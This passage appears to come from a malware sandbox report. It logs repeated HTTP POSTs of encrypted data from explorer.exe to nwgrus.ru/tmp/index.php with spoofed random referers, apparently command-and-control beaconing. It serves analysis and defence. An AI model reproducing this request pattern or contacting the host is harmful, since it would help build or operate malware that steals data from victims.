                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                            Oct 4, 2024 19:17:41.937155008 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:40 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            8192.168.2.449744177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:41.943613052 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://soxhctcejph.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 126
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:41.943629980 CEST126OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 2d 47 ea bb
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu-G_XVo3HfNC*`g>dD
                                                                                                                                            Oct 4, 2024 19:17:43.234663963 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:42 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            9192.168.2.449745177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:43.247756958 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://unecmrmecypjdcds.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 233
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:43.247783899 CEST233OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 2f 57 af a9
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu/WgHuZKai52n)zI^[T5+PA2MwB*"-J8nH<G?xdI89.K'wWS]LVo/
                                                                                                                                            Oct 4, 2024 19:17:44.532157898 CEST137INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:44 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            10192.168.2.449746177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:44.539654970 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://rsqwlptdbkicnj.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 115
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:44.539668083 CEST115OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 2d 43 fa eb
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu-C`{M?C\GpS/
                                                                                                                                            Oct 4, 2024 19:17:46.020754099 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:45 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            11192.168.2.449747177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:46.031004906 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://qfsgibodkcmgjnhs.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 349
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:46.031042099 CEST349OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 25 58 b4 ff
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu%XFor<ej2<sfQ;'H3$G@H<?.bu'DQKK$RT;KI T]N@kJj6d
                                                                                                                                            Oct 4, 2024 19:17:47.326775074 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:47 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            12192.168.2.449748177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:47.334846973 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://iypyxugbhpjfu.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 270
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:47.334862947 CEST270OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 79 51 ca 87
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vuyQQBgEatWa{7r*^_}C(j<9n@/H-,RL\p,'mw2VM@T=z8kIZp:hJ>
                                                                                                                                            Oct 4, 2024 19:17:48.977094889 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:48 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            13192.168.2.449749177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:49.184708118 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://wckgnkwavbhg.org/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 115
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:49.184753895 CEST115OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 5f 3b ce ec
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu_;]uj.\.8g/
                                                                                                                                            Oct 4, 2024 19:17:50.436805964 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:50 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            14192.168.2.449750177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:50.445280075 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://bsjhlaqplgxee.net/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 303
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:50.445280075 CEST303OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 27 2a e5 9b
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu'*rzXGZe&xyY0r$E0KP1!TY~#;/mV*?$zn-Z>j'fcKYZ[7gk-Z#j
                                                                                                                                            Oct 4, 2024 19:17:51.851650953 CEST137INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:51 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            15192.168.2.449751177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:51.860373974 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://msepyhqdoiyw.com/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Content-Length: 239
                                                                                                                                            Host: nwgrus.ru
                                                                                                                                            Oct 4, 2024 19:17:51.860398054 CEST239OUTData Raw: 3b 6e 55 10 83 bc 1a 22 aa a3 c6 01 03 05 72 b7 7b 08 bc e2 1d 04 e6 63 79 0e 08 e5 44 b7 b6 19 ed 57 c4 2d 07 68 21 6a 9b 9a 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 60 0d e0 ed
                                                                                                                                            Data Ascii: ;nU"r{cyDW-h!j? 9Yt M@NA -[k,vu`JyN;PG!*iy^(_iY;b[-LC@\M&|~mtK8*D&k&/]?vqiHK
                                                                                                                                            Oct 4, 2024 19:17:53.124948025 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                            Server: nginx/1.26.0
                                                                                                                                            Date: Fri, 04 Oct 2024 17:17:52 GMT
                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            16192.168.2.449752177.129.90.106802580C:\Windows\explorer.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 4, 2024 19:17:53.134146929 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Accept: */*
                                                                                                                                            Referer: http://ubqbmapskssunnlw.com/
